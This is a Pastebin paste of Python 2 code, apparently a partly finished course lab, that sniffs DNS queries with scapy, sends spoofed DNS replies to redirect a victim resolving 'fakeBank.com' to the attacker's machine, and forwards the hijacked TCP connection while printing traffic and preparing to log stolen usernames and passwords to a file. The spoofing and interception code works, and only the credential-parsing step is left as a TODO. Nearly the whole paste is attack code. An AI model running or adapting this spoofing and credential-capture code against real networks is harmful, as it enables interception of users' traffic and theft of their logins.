Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import argparse
- import socket
- from scapy.all import *
- conf.L3socket = L3RawSocket
- WEB_PORT = 8000
- HOSTNAME = "fakeBank.com"
- def resolveHostname(hostname):
- # IP address of HOSTNAME. Used to forward tcp connection.
- # Normally obtained via DNS lookup.
- return "127.1.1.1"
- def log_credentials(username, password):
- # Write stolen credentials out to file
- with open("lib/attacker/StolenCreds.txt","wb") as fd:
- fd.write("Stolen credentials: username="+username+" password="+password)
- def check_credentials(client_data):
- # TODO: Take a block of client data and search for username/password credentials
- # If found, log the credentials to the system by calling log_credentials().
- print client_data
- def handle_tcp_forwarding(client_socket, client_ip, hostname):
- # TODO: Continuously intercept new connections from the client
- # and initiate a connection with the host in order to forward data
- client_socket.listen(1)
- while True:
- # TODO: accept a new connection from the client on client_socket and
- # create a new socket to connect to the actual host associated with hostname
- print "before accept"
- conn, addr = client_socket.accept()
- print "after accept"
- host_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- host_sock.connect((resolveHostname(hostname), WEB_PORT))
- # TODO: read data from client socket, check for credentials, and forward along to
- # host socket. Check for POST to '/post_logout' and exit after that request has completed.
- data = conn.recv(5000)
- print data
- check_credentials(data)
- host_sock.send(data)
- result = host_sock.recv(5000)
- conn.send(result)
- host_sock.close()
- def dns_callback(packet,extra_args):
- # TODO: Write callback function for handling DNS packets.
- # Sends a spoofed DNS response for a query to HOSTNAME and calls handle_tcp_forwarding() after successful spoof
- source_ip, sock = extra_args
- client_ip = packet[IP].src
- print "client_ip: ", client_ip
- ip_header = IP(src=packet[IP].dst, dst=packet[IP].src)
- udp_header = UDP(sport=packet[UDP].dport, dport=packet[UDP].sport)
- # dns_header = DNS(id=packet[DNS].id, qr=1, aa=1, qd=packet[DNS].qd, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=source_ip))
- dns_header = DNS(id=packet.getlayer(DNS).id, qd=packet.getlayer(DNS).qd, qr=1, aa=1, an=DNSRR(rrname=packet.getlayer(DNS).qd.qname, ttl=10, rdata=source_ip))
- # dnsrr_header = DNSRR(rrname=HOSTNAME, rdata=source_ip)
- spoof_msg = ip_header/udp_header/dns_header
- send(spoof_msg)
- print spoof_msg.summary()
- handle_tcp_forwarding(sock, client_ip, HOSTNAME)
- def sniff_and_spoof(source_ip):
- # TODO: Open a socket and bind it to the attacker's IP and WEB_PORT
- # This socket will be used to accept connections from victimized clients
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.bind((source_ip, WEB_PORT))
- # TODO: sniff for DNS packets on the network. Make sure to pass source_ip
- # and the socket you created as extra callback arguments.
- sniff(filter='udp port 53', prn=lambda packet, args=(source_ip,sock):dns_callback(packet, args), iface='lo')
- def main():
- parser = argparse.ArgumentParser(description='Attacker who spoofs dns packet and hijacks connection')
- parser.add_argument('--source_ip',nargs='?', const=1, default="127.0.0.3", help='ip of the attacker')
- args = parser.parse_args()
- sniff_and_spoof(args.source_ip)
- if __name__=="__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement